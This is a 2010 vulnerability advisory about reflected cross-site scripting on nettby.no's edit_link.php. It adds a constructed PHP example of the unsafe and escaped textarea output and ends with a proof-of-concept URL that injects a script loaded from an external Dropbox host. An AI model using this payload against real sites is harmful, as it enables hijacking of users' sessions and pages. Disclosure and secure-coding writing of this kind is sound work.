Cross-Site Scripting (XSS) at nettby.no edit_link.php

------------------------------------------------------------------------
Cross-Site Scripting (XSS) at nettby.no edit_link.php
------------------------------------------------------------------------

Author: Audun Larsen (larsen at xqus dot com)
Date: Jan 10, 2010

--AFFECTED SOFTWARE--------------------------

Name: nettby.no
nettby.no is a Norwegian social network run by
Nettby Community AS.

--DISCUSSION---------------------------------

nettby.no is vulnerable to a non-persistent (reflected) Cross-Site
Scripting attack. The problem exists because user input is not properly
escaped before it is used to populate a textarea when sharing a link
from a remote website.
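
The flaw described above, shown next to its fix. This is an added
illustration, not nettby.no's code: the parameter names (name, url,
description) come from the proof-of-concept URL, while the form markup,
the function names and the sample input are assumptions constructed for
the example.

```php
<?php
// Added example. Form layout and function names are hypothetical.

// Vulnerable pattern: the request value goes into the textarea body as-is,
// so a "</textarea>" in the input ends the element and the rest is parsed
// as ordinary markup.
function render_form_unsafe(array $q): string
{
    return '<form method="post">'
         . '<input name="name" value="' . ($q['name'] ?? '') . '">'
         . '<input name="url" value="' . ($q['url'] ?? '') . '">'
         . '<textarea name="description">' . ($q['description'] ?? '') . '</textarea>'
         . '</form>';
}

// Encode for HTML output. ENT_QUOTES also covers the quoted attribute
// values of the two input fields; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: every reflected value is encoded at the point of output.
function render_form_safe(array $q): string
{
    return '<form method="post">'
         . '<input name="name" value="' . h((string)($q['name'] ?? '')) . '">'
         . '<input name="url" value="' . h((string)($q['url'] ?? '')) . '">'
         . '<textarea name="description">' . h((string)($q['description'] ?? '')) . '</textarea>'
         . '</form>';
}

// A correct render contains exactly one closing textarea tag.
function closes_textarea_early(string $html): bool
{
    return substr_count(strtolower($html), '</textarea') > 1;
}

// Constructed sample request: closes the textarea, then adds harmless markup.
$sample = ['name' => '', 'url' => '',
           'description' => '</textarea><b id="marker">injected</b>'];

foreach (['unsafe' => render_form_unsafe($sample),
          'safe'   => render_form_safe($sample)] as $label => $html) {
    printf("%-6s breakout=%s\n  %s\n", $label,
        closes_textarea_early($html) ? 'yes' : 'no', $html);
}
```

Because a browser decodes character references inside a textarea, the
encoded value is displayed to the user exactly as it was submitted.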

--PROOF OF CONCEPT---------------------------

http://www.nettby.no/user/edit_link.php?name=&url=&description=%3C/texta... /
%3Cscript%20src=http://dl.dropbox.com/u/432933/xss.js%3E%3C/script%3E

--TIMELINE-----------------------------------

Jan 10, 2010: Bug found
Jan 10, 2010: nettby.no notified

--DISCLAIMER---------------------------------

The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind.

Copyright © 2010 Audun Larsen, some rights reserved:
http://creativecommons.org/licenses/by-sa/3.0/
